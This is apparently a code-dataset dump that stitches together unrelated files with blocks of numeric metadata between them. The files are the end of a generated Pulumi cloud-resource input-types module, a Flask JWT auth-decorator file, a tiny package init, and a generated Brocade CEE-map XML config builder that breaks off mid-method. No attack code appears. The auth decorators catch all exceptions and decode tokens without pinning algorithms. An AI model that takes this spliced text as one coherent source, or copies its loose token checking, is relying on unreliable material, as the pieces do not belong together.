size: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[int] cpu_cores: Total cpu of the inatance.
:param pulumi.Input[int] disk_gb: The size of the disk.
:param pulumi.Input[str] hostname: The hostname of the instance.
:param pulumi.Input[int] ram_mb: Total ram of the instance
:param pulumi.Input[str] size: The size of the instance.
:param pulumi.Input[str] status: The status of Kubernetes cluster.
* `ready` -If the Kubernetes cluster is ready.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A space separated list of tags, to be used freely as required.
"""
if cpu_cores is not None:
pulumi.set(__self__, "cpu_cores", cpu_cores)
if disk_gb is not None:
pulumi.set(__self__, "disk_gb", disk_gb)
if hostname is not None:
pulumi.set(__self__, "hostname", hostname)
if ram_mb is not None:
pulumi.set(__self__, "ram_mb", ram_mb)
if size is not None:
pulumi.set(__self__, "size", size)
if status is not None:
pulumi.set(__self__, "status", status)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="cpuCores")
def cpu_cores(self) -> Optional[pulumi.Input[int]]:
"""
Total cpu of the inatance.
"""
return pulumi.get(self, "cpu_cores")
@cpu_cores.setter
def cpu_cores(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cpu_cores", value)
@property
@pulumi.getter(name="diskGb")
def disk_gb(self) -> Optional[pulumi.Input[int]]:
"""
The size of the disk.
"""
return pulumi.get(self, "disk_gb")
@disk_gb.setter
def disk_gb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "disk_gb", value)
@property
@pulumi.getter
def hostname(self) -> Optional[pulumi.Input[str]]:
"""
The hostname of the instance.
"""
return pulumi.get(self, "hostname")
@hostname.setter
def hostname(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "hostname", value)
@property
@pulumi.getter(name="ramMb")
def ram_mb(self) -> Optional[pulumi.Input[int]]:
"""
Total ram of the instance
"""
return pulumi.get(self, "ram_mb")
@ram_mb.setter
def ram_mb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ram_mb", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[str]]:
"""
The size of the instance.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
The status of Kubernetes cluster.
* `ready` -If the Kubernetes cluster is ready.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A space separated list of tags, to be used freely as required.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class LoadBalancerBackendArgs:
def __init__(__self__, *,
instance_id: pulumi.Input[str],
port: pulumi.Input[int],
protocol: pulumi.Input[str]):
pulumi.set(__self__, "instance_id", instance_id)
pulumi.set(__self__, "port", port)
pulumi.set(__self__, "protocol", protocol)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: pulumi.Input[str]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter
def port(self) -> pulumi.Input[int]:
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input[int]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def protocol(self) -> pulumi.Input[str]:
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: pulumi.Input[str]):
pulumi.set(self, "protocol", value)
@pulumi.input_type
class GetInstancesFilterArgs:
def __init__(__self__, *,
key: str,
values: Sequence[str],
all: Optional[bool] = None,
match_by: Optional[str] = None):
"""
:param str key: Filter the Instances by this key. This may be one of '`id`, `hostname`, `public_ip`, `private_ip`,
`pseudo_ip`, `size`, `cpu_cores`, `ram_mb`, `disk_gb`, `template` or `created_at`.
:param Sequence[str] values: A list of values to match against the `key` field. Only retrieves Instances
where the `key` field takes on one or more of the values provided here.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "values", values)
if all is not None:
pulumi.set(__self__, "all", all)
if match_by is not None:
pulumi.set(__self__, "match_by", match_by)
@property
@pulumi.getter
def key(self) -> str:
"""
Filter the Instances by this key. This may be one of '`id`, `hostname`, `public_ip`, `private_ip`,
`pseudo_ip`, `size`, `cpu_cores`, `ram_mb`, `disk_gb`, `template` or `created_at`.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: str):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
"""
A list of values to match against the `key` field. Only retrieves Instances
where the `key` field takes on one or more of the values provided here.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def all(self) -> Optional[bool]:
return pulumi.get(self, "all")
@all.setter
def all(self, value: Optional[bool]):
pulumi.set(self, "all", value)
@property
@pulumi.getter(name="matchBy")
def match_by(self) -> Optional[str]:
return pulumi.get(self, "match_by")
@match_by.setter
def match_by(self, value: Optional[str]):
pulumi.set(self, "match_by", value)
@pulumi.input_type
class GetInstancesSizeFilterArgs:
def __init__(__self__, *,
key: str,
values: Sequence[str],
all: Optional[bool] = None,
match_by: Optional[str] = None):
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "values", values)
if all is not None:
pulumi.set(__self__, "all", all)
if match_by is not None:
pulumi.set(__self__, "match_by", match_by)
@property
@pulumi.getter
def key(self) -> str:
return pulumi.get(self, "key")
@key.setter
def key(self, value: str):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def all(self) -> Optional[bool]:
return pulumi.get(self, "all")
@all.setter
def all(self, value: Optional[bool]):
pulumi.set(self, "all", value)
@property
@pulumi.getter(name="matchBy")
def match_by(self) -> Optional[str]:
return pulumi.get(self, "match_by")
@match_by.setter
def match_by(self, value: Optional[str]):
pulumi.set(self, "match_by", value)
@pulumi.input_type
class GetInstancesSizeSortArgs:
def __init__(__self__, *,
key: str,
direction: Optional[str] = None):
pulumi.set(__self__, "key", key)
if direction is not None:
pulumi.set(__self__, "direction", direction)
@property
@pulumi.getter
def key(self) -> str:
return pulumi.get(self, "key")
@key.setter
def key(self, value: str):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def direction(self) -> Optional[str]:
return pulumi.get(self, "direction")
@direction.setter
def direction(self, value: Optional[str]):
pulumi.set(self, "direction", value)
@pulumi.input_type
class GetInstancesSortArgs:
def __init__(__self__, *,
key: str,
direction: Optional[str] = None):
"""
:param str key: Sort the Instance by this key. This may be one of `id`, `hostname`, `public_ip`, `private_ip`,
`pseudo_ip`, `size`, `cpu_cores`, `ram_mb`, `disk_gb`, `template` or `created_at`.
:param str direction: The sort direction. This may be either `asc` or `desc`.
"""
pulumi.set(__self__, "key", key)
if direction is not None:
pulumi.set(__self__, "direction", direction)
@property
@pulumi.getter
def key(self) -> str:
"""
Sort the Instance by this key. This may be one of `id`, `hostname`, `public_ip`, `private_ip`,
`pseudo_ip`, `size`, `cpu_cores`, `ram_mb`, `disk_gb`, `template` or `created_at`.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: str):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def direction(self) -> Optional[str]:
"""
The sort direction. This may be either `asc` or `desc`.
"""
return pulumi.get(self, "direction")
@direction.setter
def direction(self, value: Optional[str]):
pulumi.set(self, "direction", value)
@pulumi.input_type
class GetKubernetesVersionFilterArgs:
def __init__(__self__, *,
key: str,
values: Sequence[str],
all: Optional[bool] = None,
match_by: Optional[str] = None):
"""
:param str key: Filter the sizes by this key. This may be one of `version`,
`label`, `type`, `default`.
:param Sequence[str] values: Only retrieves the version which keys has value that matches
one of the values provided here.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "values", values)
if all is not None:
pulumi.set(__self__, "all", all)
if match_by is not None:
pulumi.set(__self__, "match_by", match_by)
@property
@pulumi.getter
def key(self) -> str:
"""
Filter the sizes by this key. This may be one of `version`,
`label`, `type`, `default`.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: str):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
"""
Only retrieves the version which keys has value that matches
one of the values provided here.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def all(self) -> Optional[bool]:
return pulumi.get(self, "all")
@all.setter
def all(self, value: Optional[bool]):
pulumi.set(self, "all", value)
@property
@pulumi.getter(name="matchBy")
def match_by(self) -> Optional[str]:
return pulumi.get(self, "match_by")
@match_by.setter
def match_by(self, value: Optional[str]):
pulumi.set(self, "match_by", value)
@pulumi.input_type
class GetKubernetesVersionSortArgs:
def __init__(__self__, *,
key: str,
direction: Optional[str] = None):
"""
:param str key: Sort the sizes by this key. This may be one of `version`.
:param str direction: The sort direction. This may be either `asc` or `desc`.
"""
pulumi.set(__self__, "key", key)
if direction is not None:
pulumi.set(__self__, "direction", direction)
@property
@pulumi.getter
def key(self) -> str:
"""
Sort the sizes by this key. This may be one of `version`.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: str):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def direction(self) -> Optional[str]:
"""
The sort direction. This may be either `asc` or `desc`.
"""
return pulumi.get(self, "direction")
@direction.setter
def direction(self, value: Optional[str]):
pulumi.set(self, "direction", value)
@pulumi.input_type
class GetRegionFilterArgs:
def __init__(__self__, *,
key: str,
values: Sequence[str],
all: Optional[bool] = None,
match_by: Optional[str] = None):
"""
:param str key: Filter the sizes by this key. This may be one of `code`, `name`, `country`, `default`.
:param Sequence[str] values: Only retrieves region which keys has value that matches one of the values provided here.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "values", values)
if all is not None:
pulumi.set(__self__, "all", all)
if match_by is not None:
pulumi.set(__self__, "match_by", match_by)
@property
@pulumi.getter
def key(self) -> str:
"""
Filter the sizes by this key. This may be one of `code`, `name`, `country`, `default`.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: str):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
"""
Only retrieves region which keys has value that matches one of the values provided here.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def all(self) -> Optional[bool]:
return pulumi.get(self, "all")
@all.setter
def all(self, value: Optional[bool]):
pulumi.set(self, "all", value)
@property
@pulumi.getter(name="matchBy")
def match_by(self) -> Optional[str]:
return pulumi.get(self, "match_by")
@match_by.setter
def match_by(self, value: Optional[str]):
pulumi.set(self, "match_by", value)
@pulumi.input_type
class GetRegionSortArgs:
def __init__(__self__, *,
key: str,
direction: Optional[str] = None):
"""
:param str key: Sort the sizes by this key. This may be one of `code`,`name`.
:param str direction: The sort direction. This may be either `asc` or `desc`.
"""
pulumi.set(__self__, "key", key)
if direction is not None:
pulumi.set(__self__, "direction", direction)
@property
@pulumi.getter
def key(self) -> str:
"""
Sort the sizes by this key. This may be one of `code`,`name`.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: str):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def direction(self) -> Optional[str]:
"""
The sort direction. This may be either `asc` or `desc`.
"""
return pulumi.get(self, "direction")
@direction.setter
def direction(self, value: Optional[str]):
pulumi.set(self, "direction", value)
@pulumi.input_type
class GetTemplateFilterArgs:
def __init__(__self__, *,
key: str,
values: Sequence[str],
all: Optional[bool] = None,
match_by: Optional[str] = None):
"""
:param str key: Filter the sizes by this key. This may be one of `id`,`name`,`version`,`label`.
:param Sequence[str] values: Only retrieves the template which keys has value that matches
one of the values provided here.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "values", values)
if all is not None:
pulumi.set(__self__, "all", all)
if match_by is not None:
pulumi.set(__self__, "match_by", match_by)
@property
@pulumi.getter
def key(self) -> str:
"""
Filter the sizes by this key. This may be one of `id`,`name`,`version`,`label`.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: str):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
"""
Only retrieves the template which keys has value that matches
one of the values provided here.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def all(self) -> Optional[bool]:
return pulumi.get(self, "all")
@all.setter
def all(self, value: Optional[bool]):
pulumi.set(self, "all", value)
@property
@pulumi.getter(name="matchBy")
def match_by(self) -> Optional[str]:
return pulumi.get(self, "match_by")
@match_by.setter
def match_by(self, value: Optional[str]):
pulumi.set(self, "match_by", value)
@pulumi.input_type
class GetTemplateSortArgs:
def __init__(__self__, *,
key: str,
direction: Optional[str] = None):
"""
:param str key: Sort the sizes by this key. This may be one of `id`,`name`,`version`,`label`.
:param str direction: The sort direction. This may be either `asc` or `desc`.
"""
pulumi.set(__self__, "key", key)
if direction is not None:
pulumi.set(__self__, "direction", direction)
@property
@pulumi.getter
def key(self) -> str:
"""
Sort the sizes by this key. This may be one of `id`,`name`,`version`,`label`.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: str):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def direction(self) -> Optional[str]:
"""
The sort direction. This may be either `asc` or `desc`.
"""
return pulumi.get(self, "direction")
@direction.setter
def direction(self, value: Optional[str]):
pulumi.set(self, "direction", value)
| 31.587002
| 134
| 0.593748
| 3,610
| 30,134
| 4.813573
| 0.044875
| 0.083559
| 0.083789
| 0.06123
| 0.870519
| 0.836393
| 0.80854
| 0.781435
| 0.752546
| 0.732693
| 0
| 0.000046
| 0.279219
| 30,134
| 953
| 135
| 31.620147
| 0.8
| 0.198878
| 0
| 0.794745
| 1
| 0
| 0.070383
| 0.017728
| 0
| 0
| 0
| 0
| 0
| 1
| 0.208539
| false
| 0
| 0.00821
| 0.027915
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a6044c0856b430dfa042f2d93b2bd922bf51a509
| 2,679
|
py
|
Python
|
resources/auth.py
|
mikenthiwa/Ride-My-Way
|
2ad702903f971e0cd474d9e7339174bbe37c47d8
|
[
"MIT"
] | null | null | null |
resources/auth.py
|
mikenthiwa/Ride-My-Way
|
2ad702903f971e0cd474d9e7339174bbe37c47d8
|
[
"MIT"
] | 2
|
2018-06-12T15:29:44.000Z
|
2018-07-04T09:59:12.000Z
|
resources/auth.py
|
mikenthiwa/Ride-My-Way
|
2ad702903f971e0cd474d9e7339174bbe37c47d8
|
[
"MIT"
] | 4
|
2018-06-24T19:05:33.000Z
|
2018-10-17T15:05:43.000Z
|
from flask import jsonify, request, make_response
from functools import wraps
import jwt
from instance.config import Config
def token_required(f):
"""Checks for authenticated users with valid token in the header"""
@wraps(f)
def decorated(*args, **kwargs):
"""validate token provided"""
token = None
if 'x-access-token' in request.headers:
token = request.headers['x-access-token']
if token is None:
return make_response(jsonify({"message" : "Please sign-up and login"}), 401)
try:
data = jwt.decode(token, Config.SECRET)
except:
return make_response(jsonify({
"message" : "kindly provide a valid token in the header"}), 401)
return f(*args, **kwargs)
return decorated
def driver_required(f):
"""Checks for authenticated admins with valid token in the header"""
@wraps(f)
def decorated(*args, **kwargs):
"""validate token provided and ensures the user is an admin"""
token = None
if 'x-access-token' in request.headers:
token = request.headers['x-access-token']
if token is None:
return make_response(jsonify({
"message" : "Please sign-up and login"}), 401)
try:
data = jwt.decode(token, Config.SECRET)
driver = data['is_driver']
except:
return make_response(jsonify({
"message" : "kindly provide a valid token in the header"}), 401)
if not driver:
return make_response(jsonify({
"message" : "you are not authorized to perform this function as a non-driver user"}), 401)
return f(*args, **kwargs)
return decorated
def admin_required(f):
"""Checks for authenticated admins with valid token in the header"""
@wraps(f)
def decorated(*args, **kwargs):
"""validate token provided and ensures the user is an admin"""
token = None
if 'x-access-token' in request.headers:
token = request.headers['x-access-token']
if token is None:
return make_response(jsonify({"message": "Please sign-up and login"}), 401)
try:
data = jwt.decode(token, Config.SECRET)
admin = data['is_admin']
except:
return make_response(jsonify({"message": "kindly provide a valid token in the header"}), 401)
if not admin:
return make_response(
jsonify({"message": "you are not authorized to perform this function as a non-admin user"}), 401)
return f(*args, **kwargs)
return decorated
| 29.766667
| 113
| 0.597238
| 327
| 2,679
| 4.850153
| 0.207951
| 0.068096
| 0.090794
| 0.126103
| 0.883985
| 0.864439
| 0.864439
| 0.864439
| 0.791299
| 0.791299
| 0
| 0.012759
| 0.297872
| 2,679
| 90
| 114
| 29.766667
| 0.830409
| 0.121314
| 0
| 0.719298
| 0
| 0
| 0.210843
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.070175
| 0
| 0.421053
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a6625da32d7d42a2a63cbc4057cea2b3f376aaa2
| 48
|
py
|
Python
|
atmcraft/model/__init__.py
|
zzzeek/pycon2014_atmcraft
|
588a00d0cdfe7be272e557d1dc3d99296538f401
|
[
"MIT"
] | null | null | null |
atmcraft/model/__init__.py
|
zzzeek/pycon2014_atmcraft
|
588a00d0cdfe7be272e557d1dc3d99296538f401
|
[
"MIT"
] | null | null | null |
atmcraft/model/__init__.py
|
zzzeek/pycon2014_atmcraft
|
588a00d0cdfe7be272e557d1dc3d99296538f401
|
[
"MIT"
] | null | null | null |
from . import meta
from . import account, client
| 24
| 29
| 0.770833
| 7
| 48
| 5.285714
| 0.714286
| 0.540541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 48
| 2
| 29
| 24
| 0.925
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
473283ac38608b80b811b63d411f6bad07ef689c
| 19,162
|
py
|
Python
|
pynos/versions/ver_7/ver_7_1_0/yang/brocade_cee_map.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 12
|
2015-09-21T23:56:09.000Z
|
2018-03-30T04:35:32.000Z
|
pynos/versions/ver_7/ver_7_1_0/yang/brocade_cee_map.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 10
|
2016-09-15T19:03:27.000Z
|
2017-07-17T23:38:01.000Z
|
pynos/versions/ver_7/ver_7_1_0/yang/brocade_cee_map.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 6
|
2015-08-14T08:05:23.000Z
|
2022-02-03T15:33:54.000Z
|
#!/usr/bin/env python
import xml.etree.ElementTree as ET
class brocade_cee_map(object):
"""Auto generated class.
"""
def __init__(self, **kwargs):
self._callback = kwargs.pop('callback')
def cee_map_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name = ET.SubElement(cee_map, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_precedence(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
precedence = ET.SubElement(cee_map, "precedence")
precedence.text = kwargs.pop('precedence')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_group_table_PGID(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_group_table = ET.SubElement(cee_map, "priority-group-table")
PGID = ET.SubElement(priority_group_table, "PGID")
PGID.text = kwargs.pop('PGID')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_group_table_weight(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_group_table = ET.SubElement(cee_map, "priority-group-table")
PGID_key = ET.SubElement(priority_group_table, "PGID")
PGID_key.text = kwargs.pop('PGID')
weight = ET.SubElement(priority_group_table, "weight")
weight.text = kwargs.pop('weight')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_group_table_pfc(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_group_table = ET.SubElement(cee_map, "priority-group-table")
PGID_key = ET.SubElement(priority_group_table, "PGID")
PGID_key.text = kwargs.pop('PGID')
pfc = ET.SubElement(priority_group_table, "pfc")
pfc.text = kwargs.pop('pfc')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_table_map_cos0_pgid(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_table = ET.SubElement(cee_map, "priority-table")
map_cos0_pgid = ET.SubElement(priority_table, "map-cos0-pgid")
map_cos0_pgid.text = kwargs.pop('map_cos0_pgid')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_table_map_cos1_pgid(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_table = ET.SubElement(cee_map, "priority-table")
map_cos1_pgid = ET.SubElement(priority_table, "map-cos1-pgid")
map_cos1_pgid.text = kwargs.pop('map_cos1_pgid')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_table_map_cos2_pgid(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_table = ET.SubElement(cee_map, "priority-table")
map_cos2_pgid = ET.SubElement(priority_table, "map-cos2-pgid")
map_cos2_pgid.text = kwargs.pop('map_cos2_pgid')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_table_map_cos3_pgid(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_table = ET.SubElement(cee_map, "priority-table")
map_cos3_pgid = ET.SubElement(priority_table, "map-cos3-pgid")
map_cos3_pgid.text = kwargs.pop('map_cos3_pgid')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_table_map_cos4_pgid(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_table = ET.SubElement(cee_map, "priority-table")
map_cos4_pgid = ET.SubElement(priority_table, "map-cos4-pgid")
map_cos4_pgid.text = kwargs.pop('map_cos4_pgid')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_table_map_cos5_pgid(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_table = ET.SubElement(cee_map, "priority-table")
map_cos5_pgid = ET.SubElement(priority_table, "map-cos5-pgid")
map_cos5_pgid.text = kwargs.pop('map_cos5_pgid')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_table_map_cos6_pgid(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_table = ET.SubElement(cee_map, "priority-table")
map_cos6_pgid = ET.SubElement(priority_table, "map-cos6-pgid")
map_cos6_pgid.text = kwargs.pop('map_cos6_pgid')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_table_map_cos7_pgid(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_table = ET.SubElement(cee_map, "priority-table")
map_cos7_pgid = ET.SubElement(priority_table, "map-cos7-pgid")
map_cos7_pgid.text = kwargs.pop('map_cos7_pgid')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_remap_fabric_priority_fabric_remapped_priority(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
remap = ET.SubElement(cee_map, "remap")
fabric_priority = ET.SubElement(remap, "fabric-priority")
fabric_remapped_priority = ET.SubElement(fabric_priority, "fabric-remapped-priority")
fabric_remapped_priority.text = kwargs.pop('fabric_remapped_priority')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_remap_lossless_priority_lossless_remapped_priority(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
remap = ET.SubElement(cee_map, "remap")
lossless_priority = ET.SubElement(remap, "lossless-priority")
lossless_remapped_priority = ET.SubElement(lossless_priority, "lossless-remapped-priority")
lossless_remapped_priority.text = kwargs.pop('lossless_remapped_priority')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name = ET.SubElement(cee_map, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_precedence(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
precedence = ET.SubElement(cee_map, "precedence")
precedence.text = kwargs.pop('precedence')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_group_table_PGID(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_group_table = ET.SubElement(cee_map, "priority-group-table")
PGID = ET.SubElement(priority_group_table, "PGID")
PGID.text = kwargs.pop('PGID')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_group_table_weight(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
name_key.text = kwargs.pop('name')
priority_group_table = ET.SubElement(cee_map, "priority-group-table")
PGID_key = ET.SubElement(priority_group_table, "PGID")
PGID_key.text = kwargs.pop('PGID')
weight = ET.SubElement(priority_group_table, "weight")
weight.text = kwargs.pop('weight')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def cee_map_priority_group_table_pfc(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
name_key = ET.SubElement(cee_map, "name")
